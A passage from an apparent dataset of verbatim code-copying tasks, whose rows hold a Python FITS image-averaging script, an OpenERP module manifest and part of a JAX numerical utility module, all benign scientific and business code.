prompt
listlengths 1
1
| compression_prompt
listlengths 1
1
| target
stringlengths 1.03k
828k
|
|---|---|---|
[
{
"content": "```python\n#! /usr/bin/env python\n#\n# quick and dirty processing of the MD All Sky images\n\nfrom astropy.io import fits\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom scipy.misc import imsave\nimport numpy as np\nimport aplpy\nimport argparse as ap\nimport os.path\nimport logging\nimport time\n\ndef d(ff,box=[]):\n #very specific for 16 bit data, since we want to keep the data in uint16\n h = fits.open(ff, do_not_scale_image_data=True)\n if len(box)==0:\n return h[0].header, h[0].data\n else:\n # figure out 0 vs. 1 based offsets; box is 1 based\n return h[0].header, h[0].data[box[1]:box[3], box[0]:box[2]]\n\n\ndef dsum(i0,i1,step = 1, box=[]):\n \"\"\" for a range of fits files\n compute the mean and dispersion from the mean\n \"\"\"\n for i in range(i0,i1+1,step):\n ff = 'IMG%05d.FIT' % i\n h1, d1 = d(ff,box)\n #very specific for 16 bit data, since we want to keep the data in uint16\n bzero = h1['BZERO']\n bscale = h1['BSCALE']\n if i == i0: \n sum0 = 1.0\n sum1 = d1*bscale+bzero\n sum2 = sum1*sum1\n #sum1 = d1\n #sum2 = d1*d1\n h = h1\n nx = d1.shape[1]\n ny = d1.shape[0]\n nz = i1 + 1 - i0\n c = np.zeros((nz, ny, nx))\n c[0,:,:] = d1.reshape(ny,nx)\n else:\n sum0 = sum0 + 1.0\n sum1 = sum1 + (d1 * bscale + bzero)\n sum2 = sum2 + (d1 * bscale + bzero) * (d1 * bscale + bzero)\n #sum2 = sum2+d1*d1\n c[i - i0,:,:] = d1.reshape(ny,nx)\n sum1 = sum1 / sum0\n sum2 = sum2 / sum0 - sum1*sum1\n print type(sum1), type(sum2)\n return h,sum1,np.sqrt(sum2),c\n\ndef show(sum):\n \"\"\" some native matplotlib display,\n doesn't show pointsources well at all\n \"\"\"\n ip = plt.imshow(sum)\n plt.show()\n\ndef show2(sum):\n \"\"\" aplpy is the better viewer clearly\n \"\"\"\n fig = aplpy.FITSFigure(sum)\n #fig.show_grayscale()\n fig.show_colorscale()\n\ndef show3(sum1,sum2):\n \"\"\" aplpy is the better viewer clearly\n \"\"\"\n fig = aplpy.FITSFigure(sum1,subplot=(2,2,1))\n #fig = aplpy.FITSFigure(sum2,subplot=(2,2,2),figure=1)\n fig.show_grayscale()\n\n# For some variations on this theme, e.g. time.time vs. time.clock, see\n# http://stackoverflow.com/questions/7370801/measure-time-elapsed-in-python\n#\nclass Dtime(object):\n \"\"\" Class to help measuring the wall clock time between tagged events\n Typical usage:\n dt = Dtime()\n ...\n dt.tag('a')\n ...\n dt.tag('b')\n \"\"\"\n def __init__(self, label=\".\", report=True):\n self.start = self.time()\n self.init = self.start\n self.label = label\n self.report = report\n self.dtimes = []\n dt = self.init - self.init\n if self.report:\n logging.info(\"Dtime: %s ADMIT \" % self.label + str(self.start))\n logging.info(\"Dtime: %s BEGIN \" % self.label + str(dt))\n\n def reset(self, report=True):\n self.start = self.time()\n self.report = report\n self.dtimes = []\n\n def tag(self, mytag):\n t0 = self.start\n t1 = self.time()\n dt = t1 - t0\n self.dtimes.append((mytag, dt))\n self.start = t1\n if self.report:\n logging.info(\"Dtime: %s \" % self.label + mytag + \" \" + str(dt))\n return dt\n\n def show(self):\n if self.report:\n for r in self.dtimes:\n logging.info(\"Dtime: %s \" % self.label + str(r[0]) + \" \" + str(r[1]))\n return self.dtimes\n\n def end(self):\n t0 = self.init\n t1 = self.time()\n dt = t1 - t0\n if self.report:\n logging.info(\"Dtime: %s END \" % self.label + str(dt))\n return dt\n\n def time(self):\n \"\"\" pick the actual OS routine that returns some kind of timer\n time.time : wall clock time (include I/O and multitasking overhead)\n time.clock : cpu clock time\n \"\"\"\n return np.array([time.clock(), time.time()])\n\n \n\n\nif __name__ == '__main__':\n logging.basicConfig(level = logging.INFO)\n dt = Dtime(\"mplot1\") \n \n #--start, -s n\n #--end, -e n\n #--box x1 y1 x2 y2\n parser = ap.ArgumentParser(description='Plotting .fits files.')\n parser.add_argument('-f', '--frame', nargs = '*', type = int, help = 'Starting and ending parameters for the frames analyzed')\n parser.add_argument('-b', '--box', nargs = 4, type = int, help = 'Coordinates for the bottom left corner and top right corner of a rectangle of pixels to be analyzed from the data. In the structure x1, y1, x2, y2 (1 based numbers)')\n parser.add_argument('-g', '--graphics', nargs = 1, type = int, default = 0, help = 'Controls whether to display or save graphics. 0: no graphics, 1: display graphics, 2: save graphics as .png')\n args = vars(parser.parse_args())\n\n if args['frame'] == None:\n count = 0\n start = None\n end = None\n step = 1\n #while we have yet to find an end\n while end == None:\n filename = 'IMG%05d.FIT' % count\n #if start has not been found yet, and this file exists\n if start == None and os.path.isfile(filename):\n start = count\n #if start has been found and we finally found a file that doesn't exist, set end to the last file that existed (count - 1.FIT)\n elif start != None and not os.path.isfile(filename):\n end = count - 1\n count += 1 \n elif len(args['frame']) >= 2 and len(args['frame']) <= 3:\n start = args['frame'][0] # starting frame (IMGnnnnn.FIT)\n end = args['frame'][1] # ending frame\n if len(args['frame']) == 3:\n step = args['frame']\n else:\n step = 1\n else:\n raise Exception,\"-f needs 0, 2, or 3 arguments.\"\n \n box = args['box'] # BLC and TRC\n if box == None:\n box = []\n\n dt.tag(\"start\")\n # compute the average and dispersion of the series \n h1,sum1,sum2,cube = dsum(start,end,step,box=box) # end can be uninitialized here might throw an error?\n dt.tag(\"dsum\")\n nz = cube.shape[0]\n \n # delta X and Y images\n dsumy = sum1 - np.roll(sum1, 1, axis = 0) # change in the y axis\n dsumx = sum1 - np.roll(sum1, 1, axis = 1) # change in the x axis\n\n # write them to FITS\n fits.writeto('dsumx.fits', dsumx, h1, clobber=True)\n fits.writeto('dsumy.fits', dsumy, h1, clobber=True)\n fits.writeto('sum1.fits', sum1, h1, clobber=True)\n fits.writeto('sum2.fits', sum2, h1, clobber=True)\n dt.tag(\"write2d\")\n # 3D cube to\n h1['NAXIS'] = 3\n h1['NAXIS3'] = nz\n fits.writeto('cube.fits', cube, h1, clobber=True)\n dt.tag(\"write3d\")\n\n\n if args['graphics'][0] == 1:\n # plot the sum1 and sum2 correllation (glueviz should do this)\n s1 = sum1.flatten()\n s2 = sum2.flatten()\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.scatter(s1,s2)\n plt.show()\n show2(sum1)\n show2(sum2)\n if args['graphics'][0] == 2:\n imsave('sum1.png', sum1)\n imsave('sum2.png', sum2)\n \n dt.tag(\"done\")\n dt.end()\n```\nReturn the exact code text, without paraphrasing.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\n#! /usr/bin/env python\n#\n# quick and dirty processing of the MD All Sky images\n\nfrom astropy.io import fits\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom scipy.misc import imsave\nimport numpy as np\nimport aplpy\nimport argparse as ap\nimport os.path\nimport logging\nimport time\n\ndef d(ff,box=[]):\n #very specific for 16 bit data, since we want to keep the data in uint16\n h = fits.open(ff, do_not_scale_image_data=True)\n if len(box)==0:\n return h[0].header, h[0].data\n else:\n # figure out 0 vs. 1 based offsets; box is 1 based\n return h[0].header, h[0].data[box[1]:box[3], box[0]:box[2]]\n\n\ndef dsum(i0,i1,step = 1, box=[]):\n \"\"\" for a range of fits files\n compute the mean and dispersion from the mean\n \"\"\"\n for i in range(i0,i1+1,step):\n ff = 'IMG%05d.FIT' % i\n h1, d1 = d(ff,box)\n #very specific for 16 bit data, since we want to keep the data in uint16\n bzero = h1['BZERO']\n bscale = h1['BSCALE']\n if i == i0: \n sum0 = 1.0\n sum1 = d1*bscale+bzero\n sum2 = sum1*sum1\n #sum1 = d1\n #sum2 = d1*d1\n h = h1\n nx = d1.shape[1]\n ny = d1.shape[0]\n nz = i1 + 1 - i0\n c = np.zeros((nz, ny, nx))\n c[0,:,:] = d1.reshape(ny,nx)\n else:\n sum0 = sum0 + 1.0\n sum1 = sum1 + (d1 * bscale + bzero)\n sum2 = sum2 + (d1 * bscale + bzero) * (d1 * bscale + bzero)\n #sum2 = sum2+d1*d1\n c[i - i0,:,:] = d1.reshape(ny,nx)\n sum1 = sum1 / sum0\n sum2 = sum2 / sum0 - sum1*sum1\n print type(sum1), type(sum2)\n return h,sum1,np.sqrt(sum2),c\n\ndef show(sum):\n \"\"\" some native matplotlib display,\n doesn't show pointsources well at all\n \"\"\"\n ip = plt.imshow(sum)\n plt.show()\n\ndef show2(sum):\n \"\"\" aplpy is the better viewer clearly\n \"\"\"\n fig = aplpy.FITSFigure(sum)\n #fig.show_grayscale()\n fig.show_colorscale()\n\ndef show3(sum1,sum2):\n \"\"\" aplpy is the better viewer clearly\n \"\"\"\n fig = aplpy.FITSFigure(sum1,subplot=(2,2,1))\n #fig = aplpy.FITSFigure(sum2,subplot=(2,2,2),figure=1)\n fig.show_grayscale()\n\n# For some variations on this theme, e.g. time.time vs. time.clock, see\n# http://stackoverflow.com/questions/7370801/measure-time-elapsed-in-python\n#\nclass Dtime(object):\n \"\"\" Class to help measuring the wall clock time between tagged events\n Typical usage:\n dt = Dtime()\n ...\n dt.tag('a')\n ...\n dt.tag('b')\n \"\"\"\n def __init__(self, label=\".\", report=True):\n self.start = self.time()\n self.init = self.start\n self.label = label\n self.report = report\n self.dtimes = []\n dt = self.init - self.init\n if self.report:\n logging.info(\"Dtime: %s ADMIT \" % self.label + str(self.start))\n logging.info(\"Dtime: %s BEGIN \" % self.label + str(dt))\n\n def reset(self, report=True):\n self.start = self.time()\n self.report = report\n self.dtimes = []\n\n def tag(self, mytag):\n t0 = self.start\n t1 = self.time()\n dt = t1 - t0\n self.dtimes.append((mytag, dt))\n self.start = t1\n if self.report:\n logging.info(\"Dtime: %s \" % self.label + mytag + \" \" + str(dt))\n return dt\n\n def show(self):\n if self.report:\n for r in self.dtimes:\n logging.info(\"Dtime: %s \" % self.label + str(r[0]) + \" \" + str(r[1]))\n return self.dtimes\n\n def end(self):\n t0 = self.init\n t1 = self.time()\n dt = t1 - t0\n if self.report:\n logging.info(\"Dtime: %s END \" % self.label + str(dt))\n return dt\n\n def time(self):\n \"\"\" pick the actual OS routine that returns some kind of timer\n time.time : wall clock time (include I/O and multitasking overhead)\n time.clock : cpu clock time\n \"\"\"\n return np.array([time.clock(), time.time()])\n\n \n\n\nif __name__ == '__main__':\n logging.basicConfig(level = logging.INFO)\n dt = Dtime(\"mplot1\") \n \n #--start, -s n\n #--end, -e n\n #--box x1 y1 x2 y2\n parser = ap.ArgumentParser(description='Plotting .fits files.')\n parser.add_argument('-f', '--frame', nargs = '*', type = int, help = 'Starting and ending parameters for the frames analyzed')\n parser.add_argument('-b', '--box', nargs = 4, type = int, help = 'Coordinates for the bottom left corner and top right corner of a rectangle of pixels to be analyzed from the data. In the structure x1, y1, x2, y2 (1 based numbers)')\n parser.add_argument('-g', '--graphics', nargs = 1, type = int, default = 0, help = 'Controls whether to display or save graphics. 0: no graphics, 1: display graphics, 2: save graphics as .png')\n args = vars(parser.parse_args())\n\n if args['frame'] == None:\n count = 0\n start = None\n end = None\n step = 1\n #while we have yet to find an end\n while end == None:\n filename = 'IMG%05d.FIT' % count\n #if start has not been found yet, and this file exists\n if start == None and os.path.isfile(filename):\n start = count\n #if start has been found and we finally found a file that doesn't exist, set end to the last file that existed (count - 1.FIT)\n elif start != None and not os.path.isfile(filename):\n end = count - 1\n count += 1 \n elif len(args['frame']) >= 2 and len(args['frame']) <= 3:\n start = args['frame'][0] # starting frame (IMGnnnnn.FIT)\n end = args['frame'][1] # ending frame\n if len(args['frame']) == 3:\n step = args['frame']\n else:\n step = 1\n else:\n raise Exception,\"-f needs 0, 2, or 3 arguments.\"\n \n box = args['box'] # BLC and TRC\n if box == None:\n box = []\n\n dt.tag(\"start\")\n # compute the average and dispersion of the series \n h1,sum1,sum2,cube = dsum(start,end,step,box=box) # end can be uninitialized here might throw an error?\n dt.tag(\"dsum\")\n nz = cube.shape[0]\n \n # delta X and Y images\n dsumy = sum1 - np.roll(sum1, 1, axis = 0) # change in the y axis\n dsumx = sum1 - np.roll(sum1, 1, axis = 1) # change in the x axis\n\n # write them to FITS\n fits.writeto('dsumx.fits', dsumx, h1, clobber=True)\n fits.writeto('dsumy.fits', dsumy, h1, clobber=True)\n fits.writeto('sum1.fits', sum1, h1, clobber=True)\n fits.writeto('sum2.fits', sum2, h1, clobber=True)\n dt.tag(\"write2d\")\n # 3D cube to\n h1['NAXIS'] = 3\n h1['NAXIS3'] = nz\n fits.writeto('cube.fits', cube, h1, clobber=True)\n dt.tag(\"write3d\")\n\n\n if args['graphics'][0] == 1:\n # plot the sum1 and sum2 correllation (glueviz should do this)\n s1 = sum1.flatten()\n s2 = sum2.flatten()\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.scatter(s1,s2)\n plt.show()\n show2(sum1)\n show2(sum2)\n if args['graphics'][0] == 2:\n imsave('sum1.png', sum1)\n imsave('sum2.png', sum2)\n \n dt.tag(\"done\")\n dt.end()\n```<|memory_end|>\nReturn the exact code text, without paraphrasing.",
"role": "user"
}
] |
```python
#! /usr/bin/env python
#
# quick and dirty processing of the MD All Sky images
from astropy.io import fits
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from scipy.misc import imsave
import numpy as np
import aplpy
import argparse as ap
import os.path
import logging
import time
def d(ff,box=[]):
#very specific for 16 bit data, since we want to keep the data in uint16
h = fits.open(ff, do_not_scale_image_data=True)
if len(box)==0:
return h[0].header, h[0].data
else:
# figure out 0 vs. 1 based offsets; box is 1 based
return h[0].header, h[0].data[box[1]:box[3], box[0]:box[2]]
def dsum(i0,i1,step = 1, box=[]):
""" for a range of fits files
compute the mean and dispersion from the mean
"""
for i in range(i0,i1+1,step):
ff = 'IMG%05d.FIT' % i
h1, d1 = d(ff,box)
#very specific for 16 bit data, since we want to keep the data in uint16
bzero = h1['BZERO']
bscale = h1['BSCALE']
if i == i0:
sum0 = 1.0
sum1 = d1*bscale+bzero
sum2 = sum1*sum1
#sum1 = d1
#sum2 = d1*d1
h = h1
nx = d1.shape[1]
ny = d1.shape[0]
nz = i1 + 1 - i0
c = np.zeros((nz, ny, nx))
c[0,:,:] = d1.reshape(ny,nx)
else:
sum0 = sum0 + 1.0
sum1 = sum1 + (d1 * bscale + bzero)
sum2 = sum2 + (d1 * bscale + bzero) * (d1 * bscale + bzero)
#sum2 = sum2+d1*d1
c[i - i0,:,:] = d1.reshape(ny,nx)
sum1 = sum1 / sum0
sum2 = sum2 / sum0 - sum1*sum1
print type(sum1), type(sum2)
return h,sum1,np.sqrt(sum2),c
def show(sum):
""" some native matplotlib display,
doesn't show pointsources well at all
"""
ip = plt.imshow(sum)
plt.show()
def show2(sum):
""" aplpy is the better viewer clearly
"""
fig = aplpy.FITSFigure(sum)
#fig.show_grayscale()
fig.show_colorscale()
def show3(sum1,sum2):
""" aplpy is the better viewer clearly
"""
fig = aplpy.FITSFigure(sum1,subplot=(2,2,1))
#fig = aplpy.FITSFigure(sum2,subplot=(2,2,2),figure=1)
fig.show_grayscale()
# For some variations on this theme, e.g. time.time vs. time.clock, see
# http://stackoverflow.com/questions/7370801/measure-time-elapsed-in-python
#
class Dtime(object):
""" Class to help measuring the wall clock time between tagged events
Typical usage:
dt = Dtime()
...
dt.tag('a')
...
dt.tag('b')
"""
def __init__(self, label=".", report=True):
self.start = self.time()
self.init = self.start
self.label = label
self.report = report
self.dtimes = []
dt = self.init - self.init
if self.report:
logging.info("Dtime: %s ADMIT " % self.label + str(self.start))
logging.info("Dtime: %s BEGIN " % self.label + str(dt))
def reset(self, report=True):
self.start = self.time()
self.report = report
self.dtimes = []
def tag(self, mytag):
t0 = self.start
t1 = self.time()
dt = t1 - t0
self.dtimes.append((mytag, dt))
self.start = t1
if self.report:
logging.info("Dtime: %s " % self.label + mytag + " " + str(dt))
return dt
def show(self):
if self.report:
for r in self.dtimes:
logging.info("Dtime: %s " % self.label + str(r[0]) + " " + str(r[1]))
return self.dtimes
def end(self):
t0 = self.init
t1 = self.time()
dt = t1 - t0
if self.report:
logging.info("Dtime: %s END " % self.label + str(dt))
return dt
def time(self):
""" pick the actual OS routine that returns some kind of timer
time.time : wall clock time (include I/O and multitasking overhead)
time.clock : cpu clock time
"""
return np.array([time.clock(), time.time()])
if __name__ == '__main__':
logging.basicConfig(level = logging.INFO)
dt = Dtime("mplot1")
#--start, -s n
#--end, -e n
#--box x1 y1 x2 y2
parser = ap.ArgumentParser(description='Plotting .fits files.')
parser.add_argument('-f', '--frame', nargs = '*', type = int, help = 'Starting and ending parameters for the frames analyzed')
parser.add_argument('-b', '--box', nargs = 4, type = int, help = 'Coordinates for the bottom left corner and top right corner of a rectangle of pixels to be analyzed from the data. In the structure x1, y1, x2, y2 (1 based numbers)')
parser.add_argument('-g', '--graphics', nargs = 1, type = int, default = 0, help = 'Controls whether to display or save graphics. 0: no graphics, 1: display graphics, 2: save graphics as .png')
args = vars(parser.parse_args())
if args['frame'] == None:
count = 0
start = None
end = None
step = 1
#while we have yet to find an end
while end == None:
filename = 'IMG%05d.FIT' % count
#if start has not been found yet, and this file exists
if start == None and os.path.isfile(filename):
start = count
#if start has been found and we finally found a file that doesn't exist, set end to the last file that existed (count - 1.FIT)
elif start != None and not os.path.isfile(filename):
end = count - 1
count += 1
elif len(args['frame']) >= 2 and len(args['frame']) <= 3:
start = args['frame'][0] # starting frame (IMGnnnnn.FIT)
end = args['frame'][1] # ending frame
if len(args['frame']) == 3:
step = args['frame']
else:
step = 1
else:
raise Exception,"-f needs 0, 2, or 3 arguments."
box = args['box'] # BLC and TRC
if box == None:
box = []
dt.tag("start")
# compute the average and dispersion of the series
h1,sum1,sum2,cube = dsum(start,end,step,box=box) # end can be uninitialized here might throw an error?
dt.tag("dsum")
nz = cube.shape[0]
# delta X and Y images
dsumy = sum1 - np.roll(sum1, 1, axis = 0) # change in the y axis
dsumx = sum1 - np.roll(sum1, 1, axis = 1) # change in the x axis
# write them to FITS
fits.writeto('dsumx.fits', dsumx, h1, clobber=True)
fits.writeto('dsumy.fits', dsumy, h1, clobber=True)
fits.writeto('sum1.fits', sum1, h1, clobber=True)
fits.writeto('sum2.fits', sum2, h1, clobber=True)
dt.tag("write2d")
# 3D cube to
h1['NAXIS'] = 3
h1['NAXIS3'] = nz
fits.writeto('cube.fits', cube, h1, clobber=True)
dt.tag("write3d")
if args['graphics'][0] == 1:
# plot the sum1 and sum2 correllation (glueviz should do this)
s1 = sum1.flatten()
s2 = sum2.flatten()
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(s1,s2)
plt.show()
show2(sum1)
show2(sum2)
if args['graphics'][0] == 2:
imsave('sum1.png', sum1)
imsave('sum2.png', sum2)
dt.tag("done")
dt.end()
```
|
[
{
"content": "Here is a code file:\n```python\n# -*- coding: utf-8 -*-\n###########################################################################\n# Module Writen to OpenERP, Open Source Management Solution\n#\n# Copyright (c) 2012 Vauxoo - http://www.vauxoo.com\n# All Rights Reserved.\n# [email protected]\n############################################################################\n# Coded by: julio ([email protected])\n############################################################################\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n#\n##############################################################################\n{\n 'name': 'mrp default location',\n \"version\" : \"1.1\",\n 'author': 'Vauxoo',\n 'depends': ['mrp','product'],\n 'description': \"\"\"\n Added the Locations by default when select the product in order of production\n \"\"\",\n 'update_xml':[\n 'product_category_view.xml',\n ],\n 'active': False,\n 'installable': True\n}\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n```\nReplicate it verbatim.",
"role": "user"
}
] |
[
{
"content": "Here is a code file:\n<|memory_start|>```python\n# -*- coding: utf-8 -*-\n###########################################################################\n# Module Writen to OpenERP, Open Source Management Solution\n#\n# Copyright (c) 2012 Vauxoo - http://www.vauxoo.com\n# All Rights Reserved.\n# [email protected]\n############################################################################\n# Coded by: julio ([email protected])\n############################################################################\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n#\n##############################################################################\n{\n 'name': 'mrp default location',\n \"version\" : \"1.1\",\n 'author': 'Vauxoo',\n 'depends': ['mrp','product'],\n 'description': \"\"\"\n Added the Locations by default when select the product in order of production\n \"\"\",\n 'update_xml':[\n 'product_category_view.xml',\n ],\n 'active': False,\n 'installable': True\n}\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n```<|memory_end|>\nReplicate it verbatim.",
"role": "user"
}
] |
```python
# -*- coding: utf-8 -*-
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
#
# Copyright (c) 2012 Vauxoo - http://www.vauxoo.com
# All Rights Reserved.
# [email protected]
############################################################################
# Coded by: julio ([email protected])
############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'mrp default location',
"version" : "1.1",
'author': 'Vauxoo',
'depends': ['mrp','product'],
'description': """
Added the Locations by default when select the product in order of production
""",
'update_xml':[
'product_category_view.xml',
],
'active': False,
'installable': True
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
```
|
[
{
"content": "Reproduce the code exactly as provided (keep formatting):\n```python\n# Copyright 2021 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Lint as: python3\n\"\"\"Non-differentiable utility functions.\"\"\"\nimport collections\nfrom concurrent import futures\nimport contextlib\nimport functools\nimport time\nfrom typing import List, Union\n\nimport jax\nfrom jax import tree_util\nimport jax.numpy as jnp\nimport numpy as np\nfrom scipy import interpolate\nfrom scipy.spatial.transform import Rotation\nfrom scipy.spatial.transform import Slerp\nimport tqdm\n\n\n# pylint: disable=unused-argument\[email protected](jax.custom_jvp, nondiff_argnums=(1, 2, 3))\ndef safe_norm(x, axis=-1, keepdims=False, tol=1e-9):\n \"\"\"Calculates a np.linalg.norm(d) that's safe for gradients at d=0.\n\n These gymnastics are to avoid a poorly defined gradient for np.linal.norm(0)\n see https://github.com/google/jax/issues/3058 for details\n\n\n Args:\n x: A np.array\n axis: The axis along which to compute the norm\n keepdims: if True don't squeeze the axis.\n tol: the absolute threshold within which to zero out the gradient.\n\n Returns:\n Equivalent to np.linalg.norm(d)\n \"\"\"\n return jnp.linalg.norm(x, axis=axis, keepdims=keepdims)\n\n\n@safe_norm.defjvp\ndef _safe_norm_jvp(axis, keepdims, tol, primals, tangents):\n \"\"\"Custom JVP rule for safe_norm.\"\"\"\n x, = primals\n x_dot, = tangents\n safe_tol = max(tol, 1e-30)\n y = safe_norm(x, tol=safe_tol, axis=axis, keepdims=True)\n y_safe = jnp.maximum(y, tol) # Prevent divide by zero.\n y_dot = jnp.where(y > safe_tol, x_dot * x / y_safe, jnp.zeros_like(x))\n y_dot = jnp.sum(y_dot, axis=axis, keepdims=True)\n # Squeeze the axis if `keepdims` is True.\n if not keepdims:\n y = jnp.squeeze(y, axis=axis)\n y_dot = jnp.squeeze(y_dot, axis=axis)\n return y, y_dot\n\n\ndef jacobian_to_curl(jacobian):\n \"\"\"Computes the curl from the Jacobian.\"\"\"\n dfx_dy = jacobian[..., 0, 1]\n dfx_dz = jacobian[..., 0, 2]\n dfy_dx = jacobian[..., 1, 0]\n dfy_dz = jacobian[..., 1, 2]\n dfz_dx = jacobian[..., 2, 0]\n dfz_dy = jacobian[..., 2, 1]\n\n return jnp.stack([\n dfz_dy - dfy_dz,\n dfx_dz - dfz_dx,\n dfy_dx - dfx_dy,\n ], axis=-1)\n\n\ndef jacobian_to_div(jacobian):\n \"\"\"Computes the divergence from the Jacobian.\"\"\"\n # If F : x -> x + f(x) then dF/dx = 1 + df/dx, so subtract 1 for each\n # diagonal of the Jacobian.\n return jnp.trace(jacobian, axis1=-2, axis2=-1) - 3.0\n\n\ndef compute_psnr(mse):\n \"\"\"Compute psnr value given mse (we assume the maximum pixel value is 1).\n\n Args:\n mse: float, mean square error of pixels.\n\n Returns:\n psnr: float, the psnr value.\n \"\"\"\n return -10. * jnp.log(mse) / jnp.log(10.)\n\n\[email protected]\ndef robust_whiten(x):\n median = jnp.nanmedian(x)\n mad = jnp.nanmean(jnp.abs(x - median))\n return (x - median) / mad\n\n\ndef interpolate_codes(\n codes: Union[np.ndarray, List[np.ndarray]],\n num_samples: int,\n method='spline'):\n \"\"\"Interpolates latent codes.\n\n Args:\n codes: the codes to interpolate.\n num_samples: the number of samples to interpolate to.\n method: which method to use for interpolation.\n\n Returns:\n (np.ndarray): the interpolated codes.\n \"\"\"\n if isinstance(codes, list):\n codes = np.array(codes)\n t = np.arange(len(codes))\n xs = np.linspace(0, len(codes) - 1, num_samples)\n if method == 'spline':\n cs = interpolate.CubicSpline(t, codes, bc_type='natural')\n return cs(xs).astype(np.float32)\n elif method == 'linear':\n interp = interpolate.interp1d(t, codes, axis=0)\n return interp(xs).astype(np.float32)\n\n raise ValueError(f'Unknown method {method!r}')\n\n\ndef interpolate_cameras(cameras, num_samples: int):\n \"\"\"Interpolates the cameras to the number of output samples.\n\n Uses a spherical linear interpolation (Slerp) to interpolate the camera\n orientations and a cubic spline to interpolate the camera positions.\n\n Args:\n cameras: the input cameras to interpolate.\n num_samples: the number of output cameras.\n\n Returns:\n (List[vision_sfm.Camera]): a list of interpolated cameras.\n \"\"\"\n rotations = []\n positions = []\n for camera in cameras:\n rotations.append(camera.orientation)\n positions.append(camera.position)\n\n in_times = np.linspace(0, 1, len(rotations))\n slerp = Slerp(in_times, Rotation.from_dcm(rotations))\n spline = interpolate.CubicSpline(in_times, positions)\n\n out_times = np.linspace(0, 1, num_samples)\n out_rots = slerp(out_times).as_dcm()\n out_positions = spline(out_times)\n\n ref_camera = cameras[0]\n out_cameras = []\n for out_rot, out_pos in zip(out_rots, out_positions):\n out_camera = ref_camera.copy()\n out_camera.orientation = out_rot\n out_camera.position = out_pos\n out_cameras.append(out_camera)\n return out_cameras\n\n\ndef logit(y):\n \"\"\"The inverse of tf.nn.sigmoid().\"\"\"\n return -jnp.log(1. / y - 1.)\n\n\ndef affine_sigmoid(real, lo=0, hi=1):\n \"\"\"Maps reals to (lo, hi), where 0 maps to (lo+hi)/2.\"\"\"\n if not lo < hi:\n raise ValueError('`lo` (%g) must be < `hi` (%g)' % (lo, hi))\n alpha = jax.nn.sigmoid(real) * (hi - lo) + lo\n return alpha\n\n\ndef inv_affine_sigmoid(alpha, lo=0, hi=1):\n \"\"\"The inverse of affine_sigmoid(., lo, hi).\"\"\"\n if not lo < hi:\n raise ValueError('`lo` (%g) must be < `hi` (%g)' % (lo, hi))\n real = logit((alpha - lo) / (hi - lo))\n return real\n\n\ndef inv_softplus(y):\n \"\"\"The inverse of tf.nn.softplus().\"\"\"\n return jnp.where(y > 87.5, y, jnp.log(jnp.expm1(y)))\n\n\ndef affine_softplus(real, lo=0, ref=1):\n \"\"\"Maps real numbers to (lo, infinity), where 0 maps to ref.\"\"\"\n if not lo < ref:\n raise ValueError('`lo` (%g) must be < `ref` (%g)' % (lo, ref))\n shift = inv_softplus(1.0)\n scale = (ref - lo) * jax.nn.softplus(real + shift) + lo\n return scale\n\n\ndef inv_affine_softplus(scale, lo=0, ref=1):\n \"\"\"The inverse of affine_softplus(., lo, ref).\"\"\"\n if not lo < ref:\n raise ValueError('`lo` (%g) must be < `ref` (%g)' % (lo, ref))\n shift = inv_softplus(1.0)\n real = inv_softplus((scale - lo) / (ref - lo)) - shift\n return real\n\n\ndef learning_rate_decay(step, init_lr=5e-4, decay_steps=100000, decay_rate=0.1):\n \"\"\"Continuous learning rate decay function.\n\n The computation for learning rate is lr = (init_lr * decay_rate**(step /\n decay_steps))\n\n Args:\n step: int, the global optimization step.\n init_lr: float, the initial learning rate.\n decay_steps: int, the decay steps, please see the learning rate computation\n above.\n decay_rate: float, the decay rate, please see the learning rate computation\n above.\n\n Returns:\n lr: the learning for global step 'step'.\n \"\"\"\n power = step / decay_steps\n return init_lr * (decay_rate**power)\n\n\ndef log1p_safe(x):\n \"\"\"The same as tf.math.log1p(x), but clamps the input to prevent NaNs.\"\"\"\n return jnp.log1p(jnp.minimum(x, 3e37))\n\n\ndef exp_safe(x):\n \"\"\"The same as tf.math.exp(x), but clamps the input to prevent NaNs.\"\"\"\n return 